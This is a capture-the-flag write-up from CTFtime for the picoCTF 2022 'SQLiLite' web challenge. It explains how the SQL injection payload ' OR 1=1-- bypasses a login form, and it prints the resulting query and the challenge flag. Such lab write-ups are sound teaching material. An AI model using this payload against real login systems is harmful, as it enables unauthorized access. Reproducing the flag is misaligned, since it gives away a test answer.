CTFtime.org

SQlilite

by evyatar9 / evyatar9

Rating:

# SQLiLite - picoCTF 2022 - CMU Cybersecurity Competition
Web Exploitation, 200 Points

## Description

![‏‏info.JPG](images/info.JPG)

## SQLiLite Solution

By browsing the [website](http://saturn.picoctf.net:53389/) from the challenge description we can see the following web page:

![webpage.JPG](images/website.JPG)

If we are trying to log in using ```admin:admin``` we get the following web page:

![adminadmin.JPG](images/admin.JPG)

We can see the SQL query, We can simply use SQL injection ```' OR 1=1--``` as a password, By using this SQL injection we get:

![success.JPG](images/success.JPG)

Now, By observing the source code we get the flag ```picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}```:
```html

username: admin
password: ' OR 1=1--
SQL query: SELECT * FROM users WHERE name='admin' AND password='' OR 1=1--'
<h1>Logged in! But can you see the flag, it is in plainsight.</h1>

Your flag is: picoCTF{L00k5_l1k3_y0u_solv3d_it_33d32a56}


```

Original writeup (https://github.com/evyatar9/Writeups/tree/master/CTFs/2022-picoCTF2022/Web_Exploitation/300-SQLiLite).

Comments